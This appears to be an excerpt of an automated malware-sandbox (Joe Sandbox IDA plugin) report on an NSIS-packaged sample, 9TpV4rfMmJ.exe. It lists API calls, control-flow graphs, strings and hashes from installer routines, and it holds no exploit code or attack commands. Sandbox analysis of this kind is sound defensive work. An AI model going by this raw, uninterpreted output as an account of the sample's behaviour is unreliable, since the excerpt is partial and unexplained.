                                                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76083420), ref: 00403CED
                                                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                                                                      • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D54
                                                                                                                        • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                                                      • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                                                                                                      • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                                                                                                      • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                                                                                                      • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                      • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                      • API String ID: 1975747703-1862882193
                                                                                                                      • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                                                      • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                                                                      • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                                                      • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 378 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 395 403200-403203 387->395 396 403253-403258 387->396 390 403110-403127 388->390 392 403129 390->392 393 40312b-403134 call 4034cf 390->393 392->393 400 40325a-403262 call 403019 393->400 401 40313a-403141 393->401 398 403205-40321d call 4034e5 call 4034cf 395->398 399 403227-403251 GlobalAlloc call 4034e5 call 4032b4 395->399 396->380 398->396 421 40321f-403225 398->421 399->396 426 403264-403275 399->426 400->396 405 403143-403157 call 405fe8 401->405 406 4031bd-4031c1 401->406 411 4031cb-4031d1 405->411 424 403159-403160 405->424 410 4031c3-4031ca call 403019 406->410 406->411 410->411 417 4031e0-4031e8 411->417 418 4031d3-4031dd call 4069f7 411->418 417->390 425 4031ee 417->425 418->417 421->396 421->399 424->411 428 403162-403169 424->428 425->387 429 403277 426->429 430 40327d-403282 426->430 428->411 432 40316b-403172 428->432 429->430 431 403283-403289 430->431 431->431 433 40328b-4032a6 SetFilePointer call 405fe8 431->433 432->411 434 403174-40317b 432->434 437 4032ab 433->437 434->411 436 40317d-40319d 434->436 436->396 438 4031a3-4031a7 436->438 437->380 439 4031a9-4031ad 438->439 440 4031af-4031b7 438->440 439->425 439->440 440->411 441 4031b9-4031bb 440->441 441->411
                                                                                                                      APIs
                                                                                                                      • GetTickCount.KERNEL32 ref: 0040308E
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\9TpV4rfMmJ.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                                                                        • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\9TpV4rfMmJ.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                        • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,C:\Users\user\Desktop\9TpV4rfMmJ.exe,C:\Users\user\Desktop\9TpV4rfMmJ.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\9TpV4rfMmJ.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                                                                      • API String ID: 2803837635-2326888860
                                                                                                                      • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                      • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                                                                      • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                      • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 506 4032b4-4032cb 507 4032d4-4032dd 506->507 508 4032cd 506->508 509 4032e6-4032eb 507->509 510 4032df 507->510 508->507 511 4032fb-403308 call 4034cf 509->511 512 4032ed-4032f6 call 4034e5 509->512 510->509 516 4034bd 511->516 517 40330e-403312 511->517 512->511 518 4034bf-4034c0 516->518 519 403468-40346a 517->519 520 403318-403361 GetTickCount 517->520 523 4034c8-4034cc 518->523 521 4034aa-4034ad 519->521 522 40346c-40346f 519->522 524 4034c5 520->524 525 403367-40336f 520->525 529 4034b2-4034bb call 4034cf 521->529 530 4034af 521->530 522->524 526 403471 522->526 524->523 527 403371 525->527 528 403374-403382 call 4034cf 525->528 532 403474-40347a 526->532 527->528 528->516 540 403388-403391 528->540 529->516 538 4034c2 529->538 530->529 535 40347c 532->535 536 40347e-40348c call 4034cf 532->536 535->536 536->516 543 40348e-40349a call 4060df 536->543 538->524 542 403397-4033b7 call 406a65 540->542 548 403460-403462 542->548 549 4033bd-4033d0 GetTickCount 542->549 550 403464-403466 543->550 551 40349c-4034a6 543->551 548->518 552 4033d2-4033da 549->552 553 40341b-40341d 549->553 550->518 551->532 558 4034a8 551->558 554 4033e2-403413 MulDiv wsprintfW call 40559f 552->554 555 4033dc-4033e0 552->555 556 403454-403458 553->556 557 40341f-403423 553->557 563 403418 554->563 555->553 555->554 556->525 562 40345e 556->562 560 403425-40342c call 4060df 557->560 561 40343a-403445 557->561 558->524 566 403431-403433 560->566 565 403448-40344c 561->565 562->524 563->553 565->542 567 403452 565->567 566->550 568 403435-403438 566->568 567->524 568->565
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountTick$wsprintf
                                                                                                                      • String ID: *B$ ZB$ A$ A$... %d%%$}8@
                                                                                                                      • API String ID: 551687249-3683892814
                                                                                                                      • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                                                      • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                                                                                      • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                                                      • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 569 40176f-401794 call 402da6 call 405e83 574 401796-40179c call 40653d 569->574 575 40179e-4017b0 call 40653d call 405e0c lstrcatW 569->575 581 4017b5-4017b6 call 4067c4 574->581 575->581 584 4017bb-4017bf 581->584 585 4017c1-4017cb call 406873 584->585 586 4017f2-4017f5 584->586 594 4017dd-4017ef 585->594 595 4017cd-4017db CompareFileTime 585->595 588 4017f7-4017f8 call 406008 586->588 589 4017fd-401819 call 40602d 586->589 588->589 596 40181b-40181e 589->596 597 40188d-4018b6 call 40559f call 4032b4 589->597 594->586 595->594 598 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 596->598 599 40186f-401879 call 40559f 596->599 611 4018b8-4018bc 597->611 612 4018be-4018ca SetFileTime 597->612 598->584 633 401864-401865 598->633 609 401882-401888 599->609 613 402c33 609->613 611->612 615 4018d0-4018db CloseHandle 611->615 612->615 619 402c35-402c39 613->619 617 4018e1-4018e4 615->617 618 402c2a-402c2d 615->618 621 4018e6-4018f7 call 40657a lstrcatW 617->621 622 4018f9-4018fc call 40657a 617->622 618->613 627 401901-402398 621->627 622->627 631 40239d-4023a2 627->631 632 402398 call 405b9d 627->632 631->619 632->631 633->609 634 401867-401868 633->634 634->599
                                                                                                                      APIs
                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00441000,?,?,00000031), ref: 004017D5
                                                                                                                        • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                                                        • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,00000000,00425A20,760823A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                        • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,00000000,00425A20,760823A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                        • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                        • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll), ref: 0040560C
                                                                                                                        • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                        • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                        • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp$C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll$Call
                                                                                                                      • API String ID: 1941528284-2113116661
                                                                                                                      • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                                                                      • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                                                                                      • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                                                                      • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 635 40559f-4055b4 636 4055ba-4055cb 635->636 637 40566b-40566f 635->637 638 4055d6-4055e2 lstrlenW 636->638 639 4055cd-4055d1 call 40657a 636->639 641 4055e4-4055f4 lstrlenW 638->641 642 4055ff-405603 638->642 639->638 641->637 643 4055f6-4055fa lstrcatW 641->643 644 405612-405616 642->644 645 405605-40560c SetWindowTextW 642->645 643->642 646 405618-40565a SendMessageW * 3 644->646 647 40565c-40565e 644->647 645->644 646->647 647->637 648 405660-405663 647->648 648->637
                                                                                                                      APIs
                                                                                                                      • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,00000000,00425A20,760823A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                                                      • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,00000000,00425A20,760823A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                                                      • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,00403418), ref: 004055FA
                                                                                                                      • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll), ref: 0040560C
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                                                        • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                        • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll,00000000), ref: 00406779
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                                                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nso8C9B.tmp\System.dll
                                                                                                                      • API String ID: 1495540970-4172592475
                                                                                                                      • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                                                      • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                                                                      • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                                                                      • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 649 40689a-4068ba GetSystemDirectoryW 650 4068bc 649->650 651 4068be-4068c0 649->651 650->651 652 4068d1-4068d3 651->652 653 4068c2-4068cb 651->653 654 4068d4-406907 wsprintfW LoadLibraryExW 652->654 653->652 655 4068cd-4068cf 653->655 655->654
                                                                                                                      APIs
                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                                                                      • wsprintfW.USER32 ref: 004068EC
                                                                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                                                                      • API String ID: 2200240437-1946221925
                                                                                                                      • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                      • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                                                                                      • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                                                                      • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 656 405a6e-405ab9 CreateDirectoryW 657 405abb-405abd 656->657 658 405abf-405acc GetLastError 656->658 659 405ae6-405ae8 657->659 658->659 660 405ace-405ae2 SetFileSecurityW 658->660 660->657 661 405ae4 GetLastError 660->661 661->659
                                                                                                                      APIs
                                                                                                                      • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                                                      • GetLastError.KERNEL32 ref: 00405AC5
                                                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                                                                                                      • GetLastError.KERNEL32 ref: 00405AE4
                                                                                                                      Strings
                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.250663501010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.250663434516.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663585661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663786637.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663816094.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663848148.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663874621.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.250663928907.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_400000_9TpV4rfMmJ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                      • API String ID: 3449924974-3355392842
                                                                                                                      • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                      • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                                                                                                      • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                                                                      • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 662 71661817-71661856 call 71661bff 666 71661976-71661978 662->666 667 7166185c-71661860 662->667 668 71661862-71661868 call 7166243e 667->668 669 71661869-71661876 call 71662480 667->669 668->669 674 716618a6-716618ad 669->674 675 71661878-7166187d 669->675 676 716618af-716618cb call 71662655 call 71661654 call 71661312 GlobalFree 674->676 677 716618cd-716618d1 674->677 678 7166187f-71661880 675->678 679 71661898-7166189b 675->679 702 71661925-71661929 676->702 684 716618d3-7166191c call 71661666 call 71662655 677->684 685 7166191e-71661924 call 71662655 677->685 682 71661882-71661883 678->682 683 71661888-71661889 call 71662b98 678->683 679->674 680 7166189d-7166189e call 71662e23 679->680 694 716618a3 680->694 690 71661885-71661886 682->690 691 71661890-71661896 call 71662810 682->691 697 7166188e 683->697 684->702 685->702 690->674 690->683 701 716618a5 691->701 694->701 697->694 701->674 705 71661966-7166196d 702->705 706 7166192b-71661939 call 71662618 702->706 705->666 708 7166196f-71661970 GlobalFree 705->708 712 71661951-71661958 706->712 713 7166193b-7166193e 706->713 708->666 712->705 715 7166195a-71661965 call 716615dd 712->715 713->712 714 71661940-71661948 713->714 714->712 717 7166194a-7166194b FreeLibrary 714->717 715->705 717->712
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 71661BFF: GlobalFree.KERNEL32(?), ref: 71661E74
                                                                                                                        • Part of subcall function 71661BFF: GlobalFree.KERNEL32(?), ref: 71661E79
                                                                                                                        • Part of subcall function 71661BFF: GlobalFree.KERNEL32(?), ref: 71661E7E
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 716618C5
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 7166194B
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 71661970
                                                                                                                        • Part of subcall function 7166243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7166246F
                                                                                                                        • Part of subcall function 71662810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,71661896,00000000), ref: 716628E0
                                                                                                                        • Part of subcall function 71661666: wsprintfW.USER32 ref: 71661694
                                                                                                                      Strings
